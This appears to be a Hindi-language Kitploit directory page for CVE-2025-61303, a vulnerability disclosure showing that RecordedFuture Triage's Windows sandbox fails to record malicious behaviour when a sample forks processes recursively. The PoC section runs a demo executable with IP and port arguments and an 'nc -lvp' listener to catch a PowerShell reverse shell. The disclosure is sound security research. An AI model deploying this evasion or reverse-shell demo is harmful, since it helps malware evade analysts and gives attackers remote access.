Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-61303 — गंभीर भेद्यता (9.8) - RecordedFuture Triage डायनेमिक विश्लेषण इंजन, जब नमूने बहुत उच्च-मात्रा वाली पुनरावर्ती प्रक्रिया फोर्किंग उत्पन्न करते हैं, तो दुर्भावनापूर्ण व्यवहार को रिकॉर्ड करने में विफल हो सकता है, जिससे असंगत या लापता व्यवहारिक रिपोर्टें उत्पन्न होती हैं। | Kitploit
उपकरण/GitHubGitHub/egkritsis/cve-2025-61303
गतिशील विश्लेषण (सैंडबॉक्सिंग)भेद्यता विश्लेषणशोषणमालवेयर विश्लेषणपेपर और शोधलर्निंग और शिक्षा
GitHubegkritsis/cve-2025-61303

CVE-2025-61303

गंभीर भेद्यता (9.8) - RecordedFuture Triage डायनेमिक विश्लेषण इंजन, जब नमूने बहुत उच्च-मात्रा वाली पुनरावर्ती प्रक्रिया फोर्किंग उत्पन्न करते हैं, तो दुर्भावनापूर्ण व्यवहार को रिकॉर्ड करने में विफल हो सकता है, जिससे असंगत या लापता व्यवहारिक रिपोर्टें उत्पन्न होती हैं।

रिपॉजिटरी देखें
249 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-61303 - RecordedFuture Triage: रिकर्सिव प्रोसेस फोर्किंग के माध्यम से विश्लेषण-अस्वीकार

विवरण

RecordedFuture Triage Sandbox Windows 10 build 2004 और Windows 10 LTSC 2021 में अपने Windows व्यवहारिक विश्लेषण इंजन में एक गंभीर कमजोरी है, जो प्रस्तुत किए गए मैलवेयर नमूने को पहचान से बचने और विश्लेषण-अस्वीकार उत्पन्न करने की अनुमति देती है। यह कमजोरी तब ट्रिगर होती है जब कोई नमूना बड़ी संख्या में चाइल्ड प्रोसेस को पुनरावर्ती रूप से स्पॉन करता है, जिससे उच्च लॉग मात्रा उत्पन्न होती है और सिस्टम संसाधन समाप्त हो जाते हैं। परिणामस्वरूप, PowerShell निष्पादन और रिवर्स-शेल गतिविधि सहित प्रमुख दुर्भावनापूर्ण व्यवहार, रिकॉर्ड या रिपोर्ट नहीं किया जा सकता है, जिससे विश्लेषक गुमराह होते हैं और सैंडबॉक्स्ड विश्लेषण परिणामों की अखंडता और उपलब्धता से समझौता होता है।


CVSS स्कोर

CVSS v3.1: 9.8 (गंभीर)
वेक्टर:

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

लेखक / शोधकर्ता

  • Evgenios Gkritsis — Department of Informatics, Athens University of Economics and Business, Greece
  • Constantinos Patsakis — Department of Informatics, University of Piraeus, Greece
  • George Stergiopoulos — Department of Informatics, Athens University of Economics and Business, Greece

विवरण

नमूना vathos_rev.exe (SHA256: 3c52178c27d2a0336f6286f6cf0a4a253a507273b1a19303edcacb39d2659a4b) RecordedFuture Triage के Windows व्यवहारिक विश्लेषण इंजन में विश्लेषण-अस्वीकार की स्थिति प्रदर्शित करता है।
जब इसे Windows 10 कॉन्फ़िगरेशन के अंतर्गत विस्फोटित किया जाता है, तो नमूना पुनरावर्ती रूप से हजारों चाइल्ड प्रोसेस स्पॉन करता है, जिससे प्रोसेस-ट्रैकिंग और लॉगिंग संसाधन समाप्त हो जाते हैं। परिणामस्वरूप, सैंडबॉक्स न्यूनतम व्यवहारिक डेटा रिपोर्ट करता है और प्रमुख दुर्भावनापूर्ण क्रियाओं को रिकॉर्ड करने में विफल रहता है।


Windows 10 v2004 वातावरण

  • प्लेटफ़ॉर्म: win10v2004-20250610-en
  • आर्किटेक्चर: x64
  • अधिकतम कर्नेल समय: 104s
  • अधिकतम नेटवर्क समय: 213s
  • रिपोर्ट किया गया व्यवहारिक स्कोर: 1/10
  • पहचाना गया सिग्नेचर: “WriteProcessMemory का संदिग्ध उपयोग” (64 IoCs)
  • देखा गया व्यवहार:
    • vathos_rev.exe की निरंतर प्रोसेस रिकर्सन
    • कोई PowerShell निष्पादन या रिवर्स-शेल गतिविधि रिकॉर्ड नहीं
    • सीमित नेटवर्क ट्रैफ़िक (केवल मानक DNS और HTTP अनुरोध)
    • कोई C2 कॉलबैक या पेलोड टेलीमेट्री कैप्चर नहीं

Windows 10 LTSC 2021 वातावरण

  • प्लेटफ़ॉर्म: win10ltsc2021-20250619-en
  • आर्किटेक्चर: x64
  • अधिकतम कर्नेल समय: 105s
  • अधिकतम नेटवर्क समय: 215s
  • रिपोर्ट किया गया व्यवहारिक स्कोर: 1/10
  • पहचाना गया सिग्नेचर: “WriteProcessMemory का संदिग्ध उपयोग” (64 IoCs)
  • देखी गई प्रोसेस गतिविधि:
    • vathos_rev.exe की निरंतर प्रोसेस रिकर्सन
    • कोई PowerShell निष्पादन या रिवर्स-शेल गतिविधि रिकॉर्ड नहीं
    • सीमित नेटवर्क ट्रैफ़िक (केवल मानक DNS और HTTP अनुरोध)
    • कोई C2 कॉलबैक या पेलोड टेलीमेट्री कैप्चर नहीं

दोनों Windows 10 सैंडबॉक्स वातावरणों में, विस्फोटन होस्ट पर मैलवेयर द्वारा निष्पादित अपेक्षित PowerShell निष्पादन और रिवर्स-शेल चरणों को कैप्चर करने में विफल रहा।

सैंडबॉक्स का व्यवहारिक विश्लेषण इंजन पुनरावर्ती प्रोसेस स्पॉनिंग से संतृप्त हो गया, जिसके परिणामस्वरूप टेलीमेट्री छिन्न या गायब हो गई।

यह विश्लेषण-अस्वीकार कमजोरी की पुष्टि करता है; उच्च रिकर्सन और लॉग मात्रा के तहत व्यवहारिक इंजन दुर्भावनापूर्ण गतिविधि की रिपोर्ट करने में विफल रहता है, जिससे गलत नेगेटिव और अधूरा फोरेंसिक आउटपुट होता है।

सार्वजनिक रिपोर्ट संदर्भ:
https://tria.ge/250822-qfystshk51


प्रभाव

यह RecordedFuture Triage में एक विश्लेषण-अस्वीकार कमजोरी है, जो गतिशील विश्लेषण इंजन को व्यवहारिक गतिविधि को कैप्चर या रिपोर्ट करने में विफल कर सकती है। शोषण से विरोधी व्यवहारिक पहचान को बायपास कर सकते हैं और अधूरी या अनुपस्थित विश्लेषण रिपोर्ट उत्पन्न कर सकते हैं।

मुख्य प्रभाव

  • पहचान से बचाव: दुर्भावनापूर्ण व्यवहार अरिकॉर्डेड रह सकता है, जिससे खतरे हानिरहित दिख सकते हैं।
  • गलत विश्वास: गुम टेलीमेट्री वाले कम-स्कोर वाले विश्लेषण विश्लेषकों को गुमराह कर सकते हैं।
  • पुन: प्रयोज्य बचाव: तकनीक को लोडर/ड्रॉपर में एम्बेड किया जा सकता है और अभियानों में पुन: उपयोग किया जा सकता है।
  • शोषण में आसानी: गहरी विशेषज्ञता के बिना प्रतिलिपि योग्य, बड़े पैमाने पर दुरुपयोग का जोखिम बढ़ाता है।

आगे के परिणाम

  • मिस्ड IoCs
  • उन्नत खतरों का गलत वर्गीकरण
  • अधूरी फोरेंसिक समयरेखा

प्रभावित उत्पाद

  • उत्पाद: RecordedFuture Triage (डायनेमिक विश्लेषण प्लेटफ़ॉर्म)
  • प्रभावित घटक: Windows व्यवहारिक विश्लेषण इंजन
  • मैलवेयर नमूना: vathos_rev.exe
    • SHA256: 3c52178c27d2a0336f6286f6cf0a4a253a507273b1a19303edcacb39d2659a4b
    • MD5: dca2fc8f69f6493c7a9c1ce9a68b2454
    • SHA1: 9b4688ba4788e34bce47d91b0accc98d33dbf8d2
    • SHA512: 924e866dfce8abaee30f94bf78254777b6f7fd6a35d091402a984c233a8f0cbd104ebe34559037356697ae39613781ca90bd5e9f2b6542309090e806ec5f674b
    • आकार: 270 KB

देखे गए संवेदनशील डेटोनेशन (सार्वजनिक Triage रिपोर्ट)

Windows 10 LTSC 2021 वातावरण

  • रिपोर्ट ID: 250822-qfystshk51
  • प्लेटफ़ॉर्म: win10ltsc2021-20250619-en
  • आर्किटेक्चर: x64
  • जमा किया गया: 2025-08-22 13:12 UTC
  • रिपोर्ट किया गया: 2025-08-22 13:18 UTC

Windows 10 संस्करण 2004 वातावरण

  • रिपोर्ट ID: 250822-qfystshk51
  • प्लेटफ़ॉर्म: win10v2004-20250610-en
  • आर्किटेक्चर: x64
  • जमा किया गया: 2025-08-22 13:12 UTC
  • रिपोर्ट किया गया: 2025-08-22 13:18 UTC

नोट: इंजन बिल्ड और आंतरिक संस्करण विवरण RecordedFuture द्वारा सार्वजनिक रूप से उजागर नहीं किए जाते हैं।
सभी अवलोकन RecordedFuture के Triage प्लेटफ़ॉर्म (सबमिशन 250822-qfystshk51) से प्रतिलिपि योग्य सार्वजनिक डेटोनेशन पर आधारित हैं।


प्रूफ ऑफ कॉन्सेप्ट (PoC)

सारांश (संक्षिप्त)

प्रस्तुत डेमो बहुत उच्च प्रोसेस मात्रा और गहराई से नेस्टेड रनटाइम गतिविधि उत्पन्न करके विश्लेषण-अस्वीकार (DoA) स्थिति को पुन: उत्पन्न करता है। डेमो कई चाइल्ड प्रोसेस स्पॉन करता है और अंतिम PowerShell रिवर्स-शेल चरण से पहले मल्टी-राउंड XOR डिक्रिप्शन करता है। संवेदनशील Triage Windows 10 इमेज में अंतिम पेलोड चरण रिकॉर्ड नहीं किया जाता है या छिन्न होता है, जबकि अन्य इमेज (जैसे Windows 11) पूर्ण व्यवहार कैप्चर करती हैं।

कैसे चलाएं

root@kitploit:~
poc/vathos_demo.exe <IP> <PORT>

निर्दिष्ट IP/PORT पर एक लिसनर (जैसे nc -lvp 4444) प्रारंभ करें ताकि कनेक्शन के प्रयासों का निरीक्षण किया जा सके। डेमो बहुत अधिक संख्या में प्रोसेस स्पॉन करता है और मल्टी-राउंड XOR डिक्रिप्शन करता है, जो PowerShell रिवर्स-शेल चरण में समाप्त होता है। प्रभावित Triage कॉन्फ़िगरेशन में होस्ट पर नमूने द्वारा निष्पादित होने के बावजूद अंतिम पेलोड चरण रिकॉर्ड नहीं किया जा सकता है।

चित्र 1 - Triage अवलोकन डैशबोर्ड चित्र 1 - Triage अवलोकन डैशबोर्ड

चित्र 2 - Windows 10 v2004 व्यवहारिक रिपोर्ट (न्यूनतम टेलीमेट्री / DoA उदाहरण) चित्र 2 - Windows 10 v2004 व्यवहारिक रिपोर्ट (न्यूनतम टेलीमेट्री)

चित्र 3 - Windows 10 LTSC 2021 व्यवहारिक रिपोर्ट (न्यूनतम टेलीमेट्री / DoA उदाहरण) चित्र 3 — Windows 10 LTSC 2021 व्यवहारिक रिपोर्ट (न्यूनतम टेलीमेट्री)

चित्र 4 - Windows 10 LTSC में लॉग किए गए उदाहरण प्रोसेस (सैनिटाइज़्ड, सभी प्रोसेस लॉग नहीं किए गए) — विश्लेषण लॉग → प्रोसेसेस चित्र 4 - Windows 10 LTSC में लॉग किए गए प्रोसेस (सैनिटाइज़्ड)


संदर्भ

  • सार्वजनिक Triage विश्लेषण: https://tria.ge/250822-qfystshk51
  • https://www.cve.org/CVERecord?id=CVE-2025-61303

टूल डाउनलोड करें